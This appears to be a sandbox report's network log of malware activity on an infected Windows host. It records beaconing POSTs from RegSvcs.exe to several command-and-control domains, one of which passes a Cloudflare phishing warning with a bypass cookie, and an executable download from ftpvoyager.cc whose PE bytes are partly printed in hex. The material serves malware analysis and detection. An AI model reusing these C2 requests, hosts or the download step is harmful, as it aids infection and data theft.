Dec 22, 2023 21:12:30.059489012 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:12:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=1ukef3b6ja0e5pbnr7lepcsuuc; expires=Tue, 16-Apr-2024 13:59:08 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 20-Feb-2024 20:12:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Tue, 20-Feb-2024 20:12:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Tue, 20-Feb-2024 20:12:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gAnOE7fhJ4Dn%2BGNcRM9haP%2Fv5mqEDy1iKR7UdMCxIKv0vFNx%2BF473ia5upuxZqxyPr2in6%2BQkPshfTHSwvZRW72lOwQRIfw6ffWlvkrDqfmY96k1UMLHAMdAqW2EC4I7Kh12VuJbF%2BH9tpNK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8 Data Raw: Data Ascii:
Dec 22, 2023 21:12:30.059514046 CET	37	IN	Data Raw: 39 62 30 35 31 63 66 61 62 34 37 34 38 62 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: 9b051cfab4748b-MIAaerror #D12
Dec 22, 2023 21:12:30.059684992 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	104.21.85.41	80	2232	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:33.001482964 CET	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tablesockartfinewa.pw
Dec 22, 2023 21:12:33.001537085 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 22, 2023 21:12:33.536753893 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:12:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=utq0st76h05dgk0nplibihgg5j; expires=Tue, 16-Apr-2024 13:59:12 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 20-Feb-2024 20:12:33 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Tue, 20-Feb-2024 20:12:33 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Tue, 20-Feb-2024 20:12:33 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fGFeEp8zuV81FKMVCJ5JgKt6HXX1QwVMNiPNMNcrQ3yLpkyMCimIH2oMsRo91NWl2WcT1R3LvgO%2FR%2BsOIN4C1od7gcHhD47%2Bs5djaJVr7UnIApezyh8j0EMd5MgG3UPuuMOcOGC8rzo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b053 Data Raw: Data Ascii:
Dec 22, 2023 21:12:33.536768913 CET	31	IN	Data Raw: 61 61 65 64 36 37 65 30 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aaed67e0-MIAaerror #D12
Dec 22, 2023 21:12:33.536786079 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	104.21.87.137	80	2232	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:33.802620888 CET	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: neighborhoodfeelsa.fun
Dec 22, 2023 21:12:33.806840897 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 22, 2023 21:12:34.337953091 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:12:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=4t1pt6i5acph5eduq5bd16kfos; expires=Tue, 16-Apr-2024 13:59:13 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 20-Feb-2024 20:12:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Tue, 20-Feb-2024 20:12:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Tue, 20-Feb-2024 20:12:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kqZG6iPcFIhleZfs077xWfXYjf1tDOYc9pRcwuV7ejbAmBYO4ivY260%2Ft2qDZzbl%2BsePzgn7IMSEp2kn13qcH%2FpXjlW414%2FN%2FpIYpyrZ4cQEGJarZEFXlo3bQHaXgWXgmygrftkeQ3dY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0 Data Raw: Data Ascii:
Dec 22, 2023 21:12:34.337980986 CET	33	IN	Data Raw: 33 37 61 63 63 66 35 63 36 37 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: 37accf5c67-MIAaerror #D12
Dec 22, 2023 21:12:34.338027000 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49751	104.21.18.224	80	2232	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:34.467636108 CET	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: diagramfiremonkeyowwa.fun
Dec 22, 2023 21:12:34.467664957 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 22, 2023 21:12:34.603779078 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:12:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bJInaMcSGbo2tPiJdaQzX6d%2BirYomKrT8eAekq6E2JsHfjcw0iIbVA3KWlv%2F8himhUwAON1JWKF54TdIMU%2FG6268a6pP8bzDq8yZVCEnqv9T0C5Ux%2BR3VvJEMsoQEbfdooAfxCRmDO7V9n3J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b053bd890748b-MIA Data Raw: 31 32 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 Data Ascii: 1279<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.err
Dec 22, 2023 21:12:34.603883982 CET	1286	IN	Data Raw: 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 Data Ascii: ors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) {
Dec 22, 2023 21:12:34.603935957 CET	1286	IN	Data Raw: 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 Data Ascii: onal information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="o
Dec 22, 2023 21:12:34.604093075 CET	1286	IN	Data Raw: 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 Data Ascii: r sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">839b053bd890748b</strong></span> <span class="cf-foote
Dec 22, 2023 21:12:34.604126930 CET	157	IN	Data Raw: 6f 74 65 72 20 2d 2d 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 Data Ascii: oter --> </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Dec 22, 2023 21:12:34.604142904 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 22, 2023 21:12:34.606319904 CET	356	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=oqzyvQGoRupQoOpvVa7IiIPiYtgPwUdAMwRM74OxrDo-1703275954-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 56 Host: diagramfiremonkeyowwa.fun
Dec 22, 2023 21:12:34.606373072 CET	56	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 79 52 6e 48 75 2d 2d 49 6e 73 74 61 6c 6c 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=MyRnHu--Install&j=default
Dec 22, 2023 21:12:35.134202957 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:12:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8qojc93d11q5b4cn566jkdrcq1; expires=Tue, 16-Apr-2024 13:59:13 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 20-Feb-2024 20:12:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Tue, 20-Feb-2024 20:12:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Tue, 20-Feb-2024 20:12:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yLKIGku2w3W8y4shMxcqAkMlYOFscWW6mr8Uw1b9PqEqVhNCq0DckhpyHA465sGDBJXOdqHnUalST5tAUauEGPge6SF2AsSGU8CVx8IO9QkoeCX2IjeLgeL3aH98AqbeIQzk97Z3p%2F%2BIEa0I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b053 Data Raw: Data Ascii:
Dec 22, 2023 21:12:35.134226084 CET	31	IN	Data Raw: 61 61 33 32 37 34 38 62 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aa32748b-MIAaerror #D12
Dec 22, 2023 21:12:35.134241104 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49752	196.188.169.138	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:34.884825945 CET	164	OUT	GET /ftp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: ftpvoyager.cc
Dec 22, 2023 21:12:35.424666882 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Fri, 22 Dec 2023 20:12:35 GMT Content-Type: application/octet-stream Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=88cb93e4.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9b a4 a9 a0 df c5 c7 f3 df c5 c7 f3 df c5 c7 f3 c1 97 43 f3 f6 c5 c7 f3 c1 97 52 f3 c5 c5 c7 f3 c1 97 44 f3 50 c5 c7 f3 f8 03 bc f3 d8 c5 c7 f3 df c5 c6 f3 58 c5 c7 f3 c1 97 4d f3 de c5 c7 f3 c1 97 53 f3 de c5 c7 f3 c1 97 56 f3 de c5 c7 f3 52 69 63 68 df c5 c7 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0f f5 5b 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 02 00 00 b8 02 00 00 00 00 00 1a 21 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 65 cc 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 2a 03 00 50 00 00 00 00 c0 03 00 e8 07 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 28 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 ed 02 00 00 10 00 00 00 ee 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 37 00 00 00 00 03 00 00 38 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 68 00 00 00 40 03 00 00 26 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 68 69 68 6f 6e 61 67 41 02 00 00 00 b0 03 00 00 04 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 07 02 00 00 c0 03 00 00 08 02 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CRDPXMSVRichPEL[c!@eP(.text `.rdata78@@.datah@&@.hihonagAP@.rsrcT@@
Dec 22, 2023 21:12:35.424734116 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 08 88 0a c3 cc cc cc cc cc cc cc cc cc cc cc d9 ee e9 1b Data Ascii: q$o3@HH~rFP.3FFF\|$t~rFPFFF
Dec 22, 2023 21:12:35.424766064 CET	1286	IN	Data Raw: ff 75 10 ff 75 0c e8 08 24 00 00 50 ff 55 08 83 c4 10 89 45 e4 c7 45 fc fe ff ff ff e8 0b 00 00 00 8b 45 e4 e8 e4 25 00 00 c3 33 f6 e8 e2 23 00 00 50 56 e8 61 25 00 00 59 59 c3 8b ff 55 8b ec 8d 45 0c 50 6a 00 ff 75 08 68 5f 3d 40 00 e8 62 ff ff Data Ascii: uu$PUEEE%3#PVa%YYUEPjuh_=@b]UEPuuh_=@D]UEPjuhEM@']UEPuuhEM@]UjjuK]Uujju K]U]U]
Dec 22, 2023 21:12:35.424886942 CET	1286	IN	Data Raw: 7d 10 ff 75 1b e8 5d 18 00 00 83 38 22 75 35 e8 53 18 00 00 89 18 eb 2c 33 db 3b c3 7d 29 eb 02 33 db 33 c9 66 89 0e 83 f8 fe 75 18 e8 36 18 00 00 c7 00 22 00 00 00 53 53 53 53 53 e8 a3 17 00 00 83 c4 14 83 c8 ff 5f 5e 5b 5d c3 8b ff 55 8b ec ff Data Ascii: }u]8"u5S,3;})33fu6"SSSSS_^[]Uujuuuu]Uujuuuh@}]Uuuuuuh@}]U]{UVuW3;u3e9}uj^0WWWWW
Dec 22, 2023 21:12:35.424905062 CET	1286	IN	Data Raw: 6a 00 e8 8e fe ff ff 83 c4 0c c3 8b ff 56 e8 ba 7b 00 00 8b f0 56 e8 e9 92 00 00 56 e8 74 92 00 00 56 e8 41 11 00 00 56 e8 59 92 00 00 56 e8 bd 8f 00 00 56 e8 bb 8a 00 00 56 e8 ff 88 00 00 56 e8 e8 88 00 00 68 ab 1e 40 00 e8 0c 7b 00 00 83 c4 24 Data Ascii: jV{VVtVAVYVVVVh@{$@C^U=\cCu8u_hYY]MZf9@u6<@@PEu%f9@ut@v39@3jXh#C3uEPCj_}MZf9
Dec 22, 2023 21:12:35.424937010 CET	870	IN	Data Raw: 16 8b 46 08 8b 0d 94 4b 43 00 85 48 70 75 08 e8 ec a2 00 00 89 46 04 8b 46 08 f6 40 70 02 75 14 83 48 70 02 c6 46 0c 01 eb 0a 8b 08 89 0e 8b 40 04 89 46 04 8b c6 5e 5d c2 04 00 80 79 0c 00 74 07 8b 41 08 83 60 70 fd c3 8b c1 c3 f6 41 0c 40 74 06 Data Ascii: FKCHpuFF@puHpF@F^]ytA`pA@tyt$IxQPYYuUVMEM>t}^]UE@]UEf@]Ux@C3ES]Vu3W}u
Dec 22, 2023 21:12:35.425019026 CET	1286	IN	Data Raw: 0a 0f be ca 8d 44 08 d0 89 85 e8 fd ff ff e9 7b 08 00 00 80 fa 49 74 55 80 fa 68 74 44 80 fa 6c 74 18 80 fa 77 0f 85 63 08 00 00 81 8d f0 fd ff ff 00 08 00 00 e9 54 08 00 00 80 3b 6c 75 16 43 81 8d f0 fd ff ff 00 10 00 00 89 9d c4 fd ff ff e9 39 Data Ascii: D{ItUhtDltwcT;luC9- !<6u{4uCC<3u{2uCC<d<i<o<u<x<XPP
Dec 22, 2023 21:12:35.425088882 CET	1286	IN	Data Raw: 59 ff d0 59 59 80 3b 2d 75 11 81 8d f0 fd ff ff 00 01 00 00 43 89 9d e4 fd ff ff 53 e9 03 fe ff ff c7 85 e8 fd ff ff 08 00 00 00 89 8d b8 fd ff ff eb 24 83 e8 73 0f 84 b6 fc ff ff 48 48 0f 84 89 fe ff ff 83 e8 03 0f 85 b6 01 00 00 c7 85 b8 fd ff Data Ascii: YYY;-uCS$sHH'iQ0EK t@tGGG@t3@t;\|;s
Dec 22, 2023 21:12:35.425153017 CET	1286	IN	Data Raw: 6a 02 e8 cd 88 00 00 59 68 17 04 00 c0 ff 15 f8 00 43 00 50 ff 15 f4 00 43 00 8b 4d fc 33 cd 5b e8 0b e1 ff ff c9 c3 8b ff 55 8b ec 56 ff 35 84 66 43 00 e8 26 69 00 00 ff 75 08 8b f0 e8 a1 68 00 00 59 59 a3 84 66 43 00 8b c6 5e 5d c3 ff 35 84 66 Data Ascii: jYhCPCM3[UV5fC&iuhYYfC^]5fCiYU]U5fChYt]jOY]s3PPPPPU]UE3;@CtA-rHwjX]@C]DjY;#]ju
Dec 22, 2023 21:12:35.425214052 CET	1286	IN	Data Raw: df fb ff ff 53 53 53 53 53 c7 00 16 00 00 00 e8 4c fb ff ff 83 c4 14 83 c8 ff e9 d6 00 00 00 56 8b 75 08 57 39 5d 10 75 10 3b f3 75 10 39 5d 0c 75 12 33 c0 e9 ba 00 00 00 3b f3 74 07 8b 7d 0c 3b fb 77 10 e8 9a fb ff ff c7 00 16 00 00 00 e9 8f 00 Data Ascii: SSSSSLVuW9]u;u9]u3;t};wuuu;}v-8E@PVh@uL]8"ueS8\WVh@E\>u}u'8"u/M#;}"u"SSSSSs
Dec 22, 2023 21:12:35.729347944 CET	1286	IN	Data Raw: ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 13 d7 ff ff 8b 45 08 f6 40 04 66 0f 85 16 01 00 00 8b 4d 10 8d 55 e8 89 53 fc 8b 5b 0c 89 45 e8 89 4d ec 83 fb fe 74 5f 8d 49 00 8d 04 5b 8b 4c 86 14 8d 44 86 10 89 45 f0 8b 00 89 45 f8 85 c9 74 14 8b d7 e8 Data Ascii: NF38E@fMUS[EMt_I[LDEEt-E\|@GEu}t$tN38NV3:E_^[]EM9csmu)=Ct hCjtUjRCM;-E9Xth@CW

